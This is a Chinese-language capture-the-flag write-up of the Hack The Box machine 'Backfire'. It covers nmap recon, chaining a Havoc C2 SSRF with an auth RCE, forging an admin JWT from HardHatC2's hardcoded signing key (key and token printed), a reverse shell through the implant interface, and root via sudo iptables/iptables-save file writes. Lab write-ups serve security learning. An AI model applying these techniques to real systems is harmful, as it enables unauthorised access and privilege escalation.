HTB Backfire
user
recon
port_info
sudo nmap -sT -sC -sV -p22,443,5000,8000 backfire.htb
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-07 09:32 +08
Nmap scan report for backfire.htb (10.129.190.30)
Host is up (0.094s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u4 (protocol 2.0)
| ssh-hostkey:
| 256 7d:6b:ba:b6:25:48:77:ac:3a:a2:ef:ae:f5:1d:98:c4 (ECDSA)
|_ 256 be:f3:27:9e:c6:d6:29:27:7b:98:18:91:4e:97:25:99 (ED25519)
443/tcp open ssl/http nginx 1.22.1
| tls-alpn:
| http/1.1
| http/1.0
|_ http/0.9
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=127.0.0.1/organizationName=CO/stateOrProvinceName=Florida/countryName=US
| Subject Alternative Name: IP Address:127.0.0.1
| Not valid before: 2024-04-14T00:15:11
|_Not valid after: 2027-04-14T00:15:11
|_http-title: 404 Not Found
|_http-server-header: nginx/1.22.1
5000/tcp closed upnp
8000/tcp open http nginx 1.22.1
|_http-title: Index of /
| http-ls: Volume /
| SIZE TIME FILENAME
| 1559 17-Dec-2024 11:31 disable_tls.patch
| 875 17-Dec-2024 11:34 havoc.yaotl
|_
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: nginx/1.22.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.41 seconds
目标开放端口如上。在havoc.yaotl中发现了两个用户和对应的密码。且得知此目标靶机大概率开放了havoc c2的服务(443端口)除此外无其他更多信息。
exploit
尝试对443端口进行目录扫描,无有用信息。搜索现有Havoc CVE漏洞。发现目前最新版Havoc存在CVE-2024-41570、此外github上还有一个RCE。分别为未授权SSRF漏洞和auth_rce。这里我们可以如何利用呢?结合已知信息,我们有havoc应用的密码。我们是不是可以利用ssrf向Teamserver服务器请求登录?难点在于需要我们自己修改poc,将两个漏洞结合起来利用,有点困难q_q(绝不是以前网络编程没好好听)。在github上找到一个一键利用脚本获取初始shell。
ilya@backfire:~$ ls -al
total 40
drwx------ 5 ilya ilya 4096 Dec 12 10:14 .
drwxr-xr-x 4 root root 4096 Sep 28 20:05 ..
lrwxrwxrwx 1 root root 9 Dec 12 10:14 .bash_history -> /dev/null
-rw-r--r-- 1 ilya ilya 220 Sep 27 16:43 .bash_logout
-rw-r--r-- 1 ilya ilya 3526 Sep 27 16:43 .bashrc
drwxr-xr-x 2 root root 4096 Sep 30 07:39 files
-rw-r--r-- 1 root root 174 Sep 28 23:02 hardhat.txt
drwxr-xr-x 10 ilya ilya 4096 Sep 27 19:18 Havoc
-rw-r--r-- 1 ilya ilya 807 Sep 27 16:43 .profile
drwxr-xr-x 2 ilya ilya 4096 Dec 12 10:01 .ssh
-rw-r----- 1 root ilya 33 Feb 6 20:15 user.txt
ilya@backfire:~$ cat ./hardhat.txt
Sergej said he installed HardHatC2 for testing and not made any changes to the defaults
I hope he prefers Havoc bcoz I don't wanna learn another C2 framework, also Go > C#
ilya@backfire:~$ id
uid=1000(ilya) gid=1000(ilya) groups=1000(ilya),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),100(users),106(netdev)
ilya@backfire:~$ netstat -antlp
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:5000 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:7096 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8443 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:443 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:8000 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:40056 0.0.0.0:* LISTEN -
tcp 0 664 10.129.190.30:22 10.10.14.73:45746 ESTABLISHED -
tcp 0 0 127.0.0.1:5000 127.0.0.1:33334 TIME_WAIT -
tcp 0 0 127.0.0.1:5000 127.0.0.1:33348 TIME_WAIT -
tcp 0 0 127.0.0.1:5000 127.0.0.1:33326 TIME_WAIT -
tcp 0 0 127.0.0.1:5000 127.0.0.1:33324 TIME_WAIT -
tcp 0 0 127.0.0.1:5000 127.0.0.1:33362 TIME_WAIT -
tcp 0 0 127.0.0.1:5000 127.0.0.1:33316 TIME_WAIT -
tcp 0 0 127.0.0.1:5000 127.0.0.1:33378 TIME_WAIT -
tcp 0 0 127.0.0.1:5000 127.0.0.1:33300 TIME_WAIT -
tcp 0 0 10.129.190.30:22 10.10.14.73:33396 ESTABLISHED -
tcp 0 0 127.0.0.1:5000 127.0.0.1:33288 TIME_WAIT -
tcp 0 0 127.0.0.1:5000 127.0.0.1:50634 TIME_WAIT -
tcp6 0 0 :::22 :::* LISTEN -
创建ssh密钥对登录。
在ilya家目录下发现hardhat.txt,得知另一个用户Sergej使用默认配置正在运行hardhat服务且运行在7096端口,我们将7096端口代理出来。是一个登录界面。已知使用默认配置运行,这里我试了一下默认凭据,但了解到hardhatc2第一次启动时,TeamServer 会打印出 HardHat_Admin 的账号密码,是随机的,没有默认凭据。则换一种思路,搜索此hardhatc2是否也存在已知的漏洞。
发现此hardhatc2存在认证绕过漏洞和rce,其中认证绕过是因为使用了硬编码在配置文件里的JWT Signing Key。导致可以伪造jwt从而绕过认证。这里是详细介绍的文章:HardhatC2
"AllowedHosts": "*",
"Jwt": {
"Key": "jtee43gt-6543-2iur-9422-83r5w27hgzaq",
"Issuer": "hardhatc2.com"
使用poc伪造JWT,并利用此创建一个teamlead权限的账户:sth_pentest
python3 ./exp3.py Generated JWT:
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJIYXJkSGF0X0FkbWluIiwianRpIjoiMDAwNGY2ZGYtNjg3ZS00YWU0LThiYzYtNzAyYTMwODFkZTI4IiwiaHR0cDovL3NjaGVtYXMueG1sc29hcC5vcmcvd3MvMjAwNS8wNS9pZGVudGl0eS9jbGFpbXMvbmFtZWlkZW50aWZpZXIiOiIxIiwiaXNzIjoiaGFyZGhhdGMyLmNvbSIsImF1ZCI6ImhhcmRoYXRjMi5jb20iLCJpYXQiOjE3Mzg5MDYyNzAsImV4cCI6MTc0MTMyNTQ3MCwiaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93cy8yMDA4LzA2L2lkZW50aXR5L2NsYWltcy9yb2xlIjoiQWRtaW5pc3RyYXRvciJ9.kNQmZE124q8n-NNmvViCzrcnn98FkHS-mUhzZsibpOs
User sth_pentest created
在此路径下:https://127.0.0.1:7096/ImplantInteract 反弹shell。
sudo -l发现:
sergej@backfire:~$ sudo -l
Matching Defaults entries for sergej on backfire:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User sergej may run the following commands on backfire:
(root) NOPASSWD: /usr/sbin/iptables
(root) NOPASSWD: /usr/sbin/iptables-save
sudo iptables LPE按此方式进行提权。主要是利用了iptables的-m comment --comment "规则" 为规则添加评论。而此评论我们可以使用$"\nxxxx\n"的方式调用bash将\n解释为换行符,从而控制输出。再利用iptables-save强制写入任意文件。此处可以是authorized_keys或者sudoers再或者/etc/passwd等文件。
Summary
此次活动机器提供一种十分有趣的利用场景:针对与现有开源C2的漏洞利用,很少见。开拓了视野,也明白了某一天看的一位师傅的实战记录中提到的他使用默认配置的C2被反溯源的原因。(好像就是Havoc)。此外本篇记录没有图的原因是因为我感觉没什么截的必要,值得贴上来的很少,干脆就不贴(为这么点图片增加博客工作量没必要[dog],就是懒~)。